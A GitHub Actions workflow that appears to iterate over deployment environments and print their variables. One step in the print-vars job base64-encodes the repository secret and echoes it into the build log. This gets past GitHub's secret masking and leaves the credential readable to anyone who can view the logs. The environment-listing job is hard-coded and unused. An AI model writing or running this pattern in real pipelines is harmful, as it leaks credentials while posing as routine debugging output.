name: Iterate Environments

on:
  workflow_dispatch:

jobs:
  dzioblan:
    runs-on: ubuntu-latest
    outputs:
      environments: ${{ steps.get-envs.outputs.matrix }}
    steps:
      - id: get-envs
        run: |
          # Get all environments from your repo
          echo "test"
          ENVS='["dev","staging","prod","qa","uat"]'
          echo "matrix=$ENVS" >> $GITHUB_OUTPUT
  print-vars:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        environment: [env1, env2]   # Add all your environment names here
    environment: ${{ matrix.environment }}
    steps:
      - name: Print ENV (from environment vars)
        run: |
          echo "ENV=${{ vars.ENV }}"
          echo "SECRET=$(echo $SECRET | base64)"
        env:
          SECRET: ${{ secrets.SECRET }}

